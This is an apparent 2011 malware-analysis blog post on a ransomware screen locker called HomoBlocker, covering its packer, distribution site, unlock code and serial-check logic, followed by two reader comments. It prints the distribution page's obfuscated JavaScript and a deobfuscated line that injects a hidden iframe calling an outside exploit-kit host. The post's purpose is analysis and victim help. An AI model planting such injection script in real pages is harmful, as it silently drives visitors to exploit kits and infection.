Friday, 8 April 2011

Trojan.Ransom (HomoBlocker)



The resurrection of Homoblocker after a ~2 months inactivity.
NB: A WinAD server was shutdown yesterday, the 'IRON MAIDEN' version was really interesting, you should read that

What's new on this version ?
- Protected with Mystic Compressor (like his cousin)
- Use junk code (NOP'S) on the serial verification.
- Malicious Website updated. (click here for view the old stuff)


The porn image on background who represent a fake video player, have changed (Before that was not this girl)

The author himself says that in the name of pic:

The page title and the malware directory was changed,  otherwise the code is almost the same: an image who conduct to malware download.
And a .JS file who try to exploit vulnerabilities from your browser: to make you download and execute the file automatically without your permission.

stepa.js:
var _0x63a3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x69\x32\x72\x74\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6F\x72\x75\x6D\x2E\x70\x68\x70\x3F\x74\x70\x3D\x65\x64\x31\x62\x63\x35\x35\x37\x30\x39\x33\x65\x37\x35\x65\x30\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];document[_0x63a3[2]](_0x63a3[1])[_0x63a3[0]]=_0x63a3[3];

Deobfuscated:
document['getElementById']('clear_block')['innerHTML'] = '<iframe src="http://i2rt.co.cc/forum.php?tp=ed1bc557093e75e0" width="1" height="1" scrolling="no" frameborder="0"></iframe>';



Those who are familiar with exploit kits will reconize: Blackhole Exploit Kit 
On the past; they used PEK.

Dropper: 5/41 (12.2%)
payload: 5/42 (11.9%)
----------
This trojan blocker ( MD5: 1b0f32ae76450a82ec8949604f4b8a79 ) prevents all software execution.
To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.



Number to Call: 9652537359
Number to Call: 9670955653
Number to Call: 9099417960
Number to Call: 9652537545
Number to Call: 9670929482
Code to unlock Windows: THE TROOPER

1) Compare (CMP) if you have pushed [ENTER] in your keyboard


2) Get your entered serial




3) Assemble the string 'THE TROOPER' in a buffer.


4) Get your entered text (here: XYL2K) then it get the assembled string (THE TROOPER)

5) Compare your serial with 'THE TROOPER'.

----------
HomoBlocker is a variant of pornoplayer
HomoBlocker was already analyzed on the past: here (15 Jan 2k11) ~ here (16 Jan 2k11) ~ here (18 Jan 2k11) ~ here (20 Jan 2k11) ~ here (25 Jan 2k11) ~ here (30 Jan 2k11) ~ here (7 Fev 2k11)

2 comments:

  1. HomoBlocker huh? Looks interesting, and distracting. How do you stay focused while reversing stuff like this? :)

    ReplyDelete
  2. HomoBlocker is a name given by Kaspersky Lab, Ikarus and more.. I just re-use the name detection (Trojan-Ransom.Win32.HomoBlocker)

    For stay focused you need to break on it when he check the serial, like that the ransomware is freezed and olly appear, sometime that doesnt work so.. SoftICE :þ

    ReplyDelete